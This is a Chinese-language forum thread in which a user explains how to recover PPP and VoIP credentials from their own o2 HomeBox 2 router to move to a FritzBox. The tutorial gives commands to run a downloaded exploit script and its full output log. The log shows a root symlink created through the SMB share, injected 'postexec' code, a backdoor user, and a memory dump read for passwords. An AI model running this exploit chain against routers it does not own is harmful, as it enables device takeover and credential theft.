找回密码
 注册

微信登录

微信扫一扫,快速登录

萍聚头条

查看: 4705|回复: 27

[电脑] 真佩服自己,居然破解o2的homebox2(6641)的上网密码和voip帐号密码 -- 附教程

[复制链接]
发表于 2014-12-16 00:09 | 显示全部楼层 |阅读模式
本帖最后由 峰少 于 2015-11-30 23:31 编辑

刚刚搬家,“被”升级到vdsl+voip,没有analoge的电话了,送来一个o2的home box 2,想继续使用fritzbox 7360,打电话去热线,被告知了上网的账号和密码,使用internet没有问题,可是voip账号不能告诉我。

所以现在我的问题是,能破解那个6641吗?读出机子voip的数据。

多日来,仔细研究ip-phone-forum上的帖子,终于搞定了

相信越来越多的人会被o2提供这个home box 2,所以写个教程分享一下

------------------------------下面是教程 --------------------------------------
前提:
准备一U盘。格式化成ext3的格式,比如用win下面的分区助手专业版5.2,或者Linux里的GParted.
o2的白盒子上按reset,重新初始话,重新输入Inrternetzugang-Pin, 让白盒子可以上网和打电话,这样得到一干净的白盒子。插上前面格式化的u盘。

教程1:(简单版本)
这里下载脚本,在Linux环境里运行该脚本
-- 够简练吧!

教程2:(详细版本)
1. 下载Linux系统Ubuntu CD,这个可以在CD上运行Linux
ftp://ftp.uni-bayreuth.de/pub//l ... 0-desktop-amd64.iso

2. 下载后烧碟,从cd启动, 进入Ubuntu系统, (下面的图片是网络下载的,可能会有出入)


3. 打开firefox上网,由下面链接下载破解脚本:6641-own-20150105-03.sh,
http://pan.baidu.com/s/1eQ6Xit8

4. 打开左边栏上第三个图标,file,文件管理器,把Recent下刚刚下载的6641-own-20150105-3.sh文件拷贝或者移到Documents下面


5. 点击左上角的类似win里的“开始”按键,在搜索栏里输入terminal,找到并打开terminal。


以此输入下面三行命令:
cd Documents (进入Documents目录)
chmod u+x 6641-own-20150105-3.sh (使文件可执行)
sudo ./6641-own-20150105-3.sh (运行文件)
接下来,该程序问问提问三次问题,依次是box host地址,和两次sip-proxy地址,和你的电话号码,前面三个问题,使用默认值,直接回车就行,你自己的号码用49+区号+号码形式输入,z.B. 49PPPNNNNNN.
再下来就自动运行,最后出结果,如下:

sudo ./6641-own-20150105-1.sh

Please enter the IP address or hostname of your HomeBox 2 (Zyxel 6641)
or just press enter to use the default value
Host [o2.box]:

Please enter the registrar of your VoIP connection
or just press enter to use the default value
Registrar [sip.alice-voip.de]:

Please enter the sip-proxy of your VoIP connection
or just press enter to use the default value
SIP-proxy [sip.alice-voip.de]: sip.alice.voip.de

Please enter the phone numbers to search for.
Seperate numbers with space and use the format
     CCPPPPPPPNNNN
or
     0PPPPPPPNNNN
(CC=Country-Code, PPPPP=Prefix, NNNN=Number)
For example: 498005900050 498005251378 08005900050 08005251378
If you are not sure which format is correct for your account,
simply specify both formats for your phone numbers!
Phone numbers: 49123456789 0123456789 4999988877766 4955554444333
- trying to ping the box (o2.box)... SUCCESS
- trying to mount the box: //o2.box/DRIVE1_1... SUCCESS
- trying to create symlink (0_link_to_r00t_31474) to root directory... SUCCESS
- trying to unmount /tmp/tmp.gz79qPgkiv... SUCCESS
- trying to mount the box a second time for exploit preparation... SUCCESS
- trying to append "postexec" code... SUCCESS
- trying to create a user called "bob" with password "alice" SUCCESS
- trying to unmount /tmp/tmp.gz79qPgkiv... SUCCESS
- trying to mount the box a third time for exploit execution... SUCCESS
- trying to unmount /tmp/tmp.gz79qPgkiv... SUCCESS
- checking for open port on o2.box:23000... SUCCESS
- dumping memory from box to usb drive
  please be patient: this takes at least 62 seconds...
- trying to mount the box a fourth time to download the memory dump... SUCCESS
- trying to copy PPP username (<BOX-SERIAL>-CC5D4E@.*\.de), a failure here is OK... FAILURE
- trying to copy PPP password (your PIN)...
  If this fails, extraction of PPP data will fail! SUCCESS
- downloading the memory dump to /tmp/tmp.4w23OaGCmn... SUCCESS
- trying to unmount /tmp/tmp.gz79qPgkiv... SUCCESS
- looking for PPP username in memory dump, since I dind't get it from the box
  This may fail in a lot of cases - you may have to get the data from
  o2's hotline instead!
- looking for phone number + proxy name in memory dump...
   - No password for 0123456789 found, retrying with sip proxy registrar..\.alice-voip\.de
   - No password for 0123456789 found

~~~~~~~~~~~~~~~~ FINISHED, RESULTS FOLLOW ~~~~~~~~~~~~~~~~

Your PPP (internet) login data is:
     Username:    SNOCHANCEPAL-CC5D4E@sXY.bbi-o2.de
     Password:    xxxxxxxxxxxx
For phone number 49123456789, please use the following
data to configure your router:

     Phone number:    your telephone number without prefixes
     Username:    49123456789
     Password:    GONNA
     Registrar:    sip.alice-voip.de
     SIP-proxy:    sip.alice-voip.de

For phone number 4999988877766, please use the following
data to configure your router:

     Phone number:    your telephone number without prefixes
     Username:    4999988877766
     Password:    xxxxxxxxxxxxxxx
     Registrar:    sip.alice-voip.de
     SIP-proxy:    sip.alice-voip.de

For phone number 4955554444333, please use the following
data to configure your router:

     Phone number:    your telephone number without prefixes
     Username:    4955554444333
     Password:    xxxxxxxxxxxxxxx
     Registrar:    sip.alice-voip.de
     SIP-proxy:    sip.alice-voip.de

Please note:
     You may have to reconfigure you FritzBox slightly.
     o2 uses rtp_priority = 26 and rtp_port >51000
     in their box.
     In case of problems with voice quality, try to edit
         /var/flash/voip.cfg
     on your FritzBox accordingly.

- cleaning up...

Please note: Files on the USB-Stick of the Box are left intact!
You may use them to further debug your results.'

Bye!

有了上面的数据,我就可以自己设置fritzbox了


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

×

评分

1

查看全部评分

Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
发表于 2014-12-17 00:30 | 显示全部楼层
破解 ,比较麻烦,我现在用的自己的7390  1.无损开盖。 2.接ttl读猫的flash,记下。3.设置fritzbox

评分

1

查看全部评分

Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2014-12-17 00:34 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2014-12-29 01:38 | 显示全部楼层
yb_london 发表于 2014-12-16 23:34
http://www.ip-phone-forum.de/showthread.php?t=264942&s=6392270a418c9fcb6ee373833bcf8601
好像是这个 ...

谢谢,我要仔细研究一下。
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2014-12-29 01:39 | 显示全部楼层
yb_london 发表于 2014-12-16 23:30
破解 ,比较麻烦,我现在用的自己的7390  1.无损开盖。 2.接ttl读猫的flash,记下。3.设置fritzbox

6641也能这么弄吗?
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2014-12-29 12:03 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-1-1 20:16 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-1-10 01:38 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-10 02:10 | 显示全部楼层
voip帐号拿到也没用,只能在家用,也就是如果想换自己的 FritzBox 的话可以折腾一下,而且不是所有的 FritzBox 都支持。

评分

1

查看全部评分

Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-10 02:12 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-1-10 02:42 | 显示全部楼层
cindylin 发表于 2015-1-10 01:12
太佩服啦

看来电脑弄个外置光驱还是有必要

也可以弄到u盘上,弄成u盘启动。
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-10 11:54 | 显示全部楼层
好麻烦啊, 我打电话去要得, 可能运气好, 二话没说, 给了
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-10 12:04 | 显示全部楼层
yb_london 发表于 2014-12-16 23:30
破解 ,比较麻烦,我现在用的自己的7390  1.无损开盖。 2.接ttl读猫的flash,记下。3.设置fritzbox

你跟lz不在一个位面上。lz不是专搞这个的
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-10 12:05 | 显示全部楼层
guesswhoesis 发表于 2015-1-10 10:54
好麻烦啊, 我打电话去要得, 可能运气好, 二话没说, 给了

核心步骤就一个,执行一个破解脚本
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-10 14:01 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-10 14:05 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-1-10 19:47 | 显示全部楼层
mymy365 发表于 2015-1-10 01:10
voip帐号拿到也没用,只能在家用,也就是如果想换自己的 FritzBox 的话可以折腾一下,而且不是所有的 Fritz ...

为的就是把白盒子换掉,能用fritzbox。
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-1-10 19:49 | 显示全部楼层
guesswhoesis 发表于 2015-1-10 10:54
好麻烦啊, 我打电话去要得, 可能运气好, 二话没说, 给了

打电话去,只给你上网账号,没有voip账号和密码
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-1-10 19:51 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-1-10 19:54 | 显示全部楼层
moudy 发表于 2015-1-10 11:05
核心步骤就一个,执行一个破解脚本

对滴,还想用手机去执行这个脚本。手机一般都是linux系统的
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-10 22:05 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-11 00:24 | 显示全部楼层
guesswhoesis 发表于 2015-1-10 10:54
好麻烦啊, 我打电话去要得, 可能运气好, 二话没说, 给了

你这也是破解的一种  是社会工程学破解  
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-12 11:20 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复

使用道具 举报

发表于 2015-1-12 11:27 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-12 12:48 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-1-13 18:02 | 显示全部楼层
crazymoon 发表于 2015-1-10 21:05
lz棒棒哒!
虽然没看懂

多谢支持,其实就是在Linux系统下执行了一个简单的脚本
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-1-13 18:02 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

发表于 2015-1-13 18:24 | 显示全部楼层
cosailer 发表于 2015-1-10 23:24
你这也是破解的一种  是社会工程学破解

社工更好玩哩。。。
与人斗,其乐无穷~
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

我是开心果

Archiver|手机版|AGB|Impressum|Datenschutzerklärung|萍聚社区-德国热线-德国实用信息网

GMT+2, 2025-6-14 20:28 , Processed in 0.110990 second(s), 31 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表